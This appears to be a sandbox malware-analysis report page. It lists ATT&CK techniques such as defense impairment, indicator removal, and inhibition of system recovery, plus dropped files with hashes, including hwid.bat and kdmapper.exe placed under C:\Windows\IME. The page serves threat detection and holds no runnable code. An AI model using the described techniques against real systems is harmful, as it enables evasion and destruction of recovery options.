Impair Defenses

T1562

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
1a11402783a8686e08f8fa987dd07bca

SHA1
580df3865059f4e2d8be10644590317336d146ce

SHA256
9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0

SHA512
5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lge20l1o.xku.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\hwid.bat

Filesize
36B

MD5
a1ca4bebcd03fafbe2b06a46a694e29a

SHA1
ffc88125007c23ff6711147a12f9bba9c3d197ed

SHA256
c3fa59901d56ce8a95a303b22fd119cb94abf4f43c4f6d60a81fd78b7d00fa65

SHA512
6fe1730bf2a6bba058c5e1ef309a69079a6acca45c0dbca4e7d79c877257ac08e460af741459d1e335197cf4de209f2a2997816f2a2a3868b2c8d086ef789b0e

Download Submit
C:\Windows\IME\kdmapper.exe

Filesize
169B

MD5
84855c13836b389d5ec7cfd4c9266173

SHA1
1cf3056ff23c4176fd7ca9816a000ed461d6d323

SHA256
502083c916ae481cdd413b8d93315300653df5fb3dcc5770c01991de19977eae

SHA512
2479112004884d42d4ffe1174dc358c5d1b0fa2b41641d32f2fb67539c4f834d63cfbbf7e98c63b9a64e49b26390c410bb7e50f1ad4a755f32d081367af05fcb

Download Submit
memory/452-33-0x000001F945290000-0x000001F9452BA000-memory.dmp

Filesize
168KB

Download
memory/452-34-0x000001F945290000-0x000001F9452B4000-memory.dmp

Filesize
144KB

Download
memory/2996-10-0x000001C226470000-0x000001C226492000-memory.dmp

Filesize
136KB

Download